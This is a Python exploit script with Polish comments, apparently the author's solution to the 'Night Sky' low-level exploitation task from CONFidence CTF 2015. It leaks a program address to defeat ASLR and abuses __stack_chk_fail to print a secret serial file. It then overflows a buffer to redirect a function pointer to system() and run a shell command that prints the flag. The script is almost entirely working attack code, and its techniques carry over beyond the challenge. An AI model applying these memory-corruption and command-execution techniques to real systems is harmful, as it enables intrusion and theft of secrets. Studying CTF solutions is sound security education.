#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
  Nazwa pliku:      exploit.py
  Autor:            Mateusz Jurczyk
  Zadanie:          Night Sky
  Zawody:           CONFidence CTF 2015
  Kategoria:        Eksploitacja niskopoziomowa
  Punktacja:        500 pkt. (bardzo trudne)
  Liczba rozwiązań: 2 z 11 drużyn
"""

import socket
import struct
import time

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer[:-len(text)]

def dw(x):
  return struct.pack("<H", x)

def dd(x):
  return struct.pack("<I", x)

def dq(x):
  return struct.pack("<Q", x)

def add_star(s, age, name):
  read_until(s, "Select an operation.\n")
  s.send(dd(0))
  read_until(s, "Age?\n")
  s.send(dd(age))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)

def edit_star(s, idx, age, name):
  read_until(s, "Select an operation.\n")
  s.send(dd(2))
  read_until(s, "Which star?\n")
  s.send(dq(idx))
  read_until(s, "Age?\n")
  s.send(dd(age))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)

def list_stars(s):
  read_until(s, "Select an operation.\n")
  s.send(dd(3))

def create_constellation(s, name, stars):
  read_until(s, "Select an operation.\n")
  s.send(dd(4))
  read_until(s, "Name?\n")
  s.send(dq(len(name)) + name)
  read_until(s, "Stars?\n")
  s.send(dq(len(stars)))
  for star in stars:
    s.send(dq(star))

def register_program(s, payload, length = None):
  if length == None:
    length = len(payload) + 1
  
  read_until(s, "Select an operation.\n")
  s.send(dd(8))
  read_until(s, "What serial number?\n")
  s.send(dw(length) + payload)

def save_to_file(s, filename):
  read_until(s, "Select an operation.\n")
  s.send(dd(9))
  read_until(s, "File name?\n")
  s.send(dq(len(filename)) + filename)

def main():
  # Połącz się z usługą.
  s = socket.socket()
  s.connect(("127.0.0.1", 1337))

  # Utwórz gwiazdę i konstelację, a następnie ustaw nazwę gwiazdy na
  # 36 znaków, co spowoduje niedomknięcie ciągu ASCII.
  #
  # Przy okazji wpisz do pamięci statycznej ciąg LIBC_FATAL_STDERR_=1
  # poprzez nazwę gwiazdozbioru, by użyć go później do nadpisania
  # tablicy envp[].
  add_star(s, 1337, "star")
  create_constellation(s, "LIBC_FATAL_STDERR_=1", [0])
  edit_star(s, 0, 1337, "A" * 36)

  # Ujawnij adres struktury konstelacji i oblicz na jego podstawie
  # adres bazowy programu.
  list_stars(s)
  read_until(s, "A" * 36)
  static_address = struct.unpack("<Q", s.recv(6) + "\x00\x00")[0]
  IMAGEBASE = static_address - 0x205060

  # Sprowokuj wywołanie __stack_chk_fail, oczekując na ujawnienie
  # zawartości pliku serial.txt.
  #
  # char *argv[] = {0x205780 "<dane serial.txt>", NULL};
  # char *envp[] = {0x205060 "LIBC_FATAL_STDERR_=1", NULL};
  register_program(s, 
                   ("A" * 376 +
                    dq(IMAGEBASE + 0x205780) + dq(0) +
                    dq(IMAGEBASE + 0x205060) + dq(0)),
                   length = 0)
  read_until(s, "*** stack smashing detected ***: ")
  serial_no = read_until(s, " terminated")

  print "[+] Ujawniony numer seryjny: %s" % serial_no

  # Zamknij połączenie.
  s.close()

  # Próbuj ujawnić flagę w pętli aż do skutku.
  got_flag = False
  while not got_flag:
    # Odczekaj 100ms.
    time.sleep(0.1)

    # Połącz się z usługą.
    s = socket.socket()
    s.connect(("127.0.0.1", 1337))

    # Zarejestruj program ujawnionym serialem.
    register_program(s, serial_no)

    # Sprowokuj przepełnienie bufora, nadpisując dwa dolne bajty
    # adresu funkcji canonicalize_file_name() adresem pobliskiej
    # funkcji system(). Górny nibble 16 bitów jest zgadywany, a za
    # jego wartość przyjmujemy 0x0.
    #
    # W tej samej operacji przekazujemy ciąg, który zostanie
    # potraktowany przez funkcję system() jako komendę do
    # uruchomienia.
    CMD = "echo FLAG:; cat flag.txt; echo DONE;"
    save_to_file(s, CMD.ljust(4096 + 8, "\0") + dw(0x0640))

    # Odczekaj 100ms.
    print "Probuje....\n"
    time.sleep(0.1)

    # Sprawdź, czy została zwrócona flaga. Jeśli tak, wypisz ją i
    # zakończ wykonanie.
    data = s.recv(6)
    if data == "FLAG:\n":
      flag = read_until(s, "\nDONE")
      print "[+] Flaga: \"%s\"" % flag
      got_flag = True
    else:
      print "[-] Nie powiodlo sie."

    # Zamknij połączenie.
    s.close()

if __name__ == "__main__":
  main()

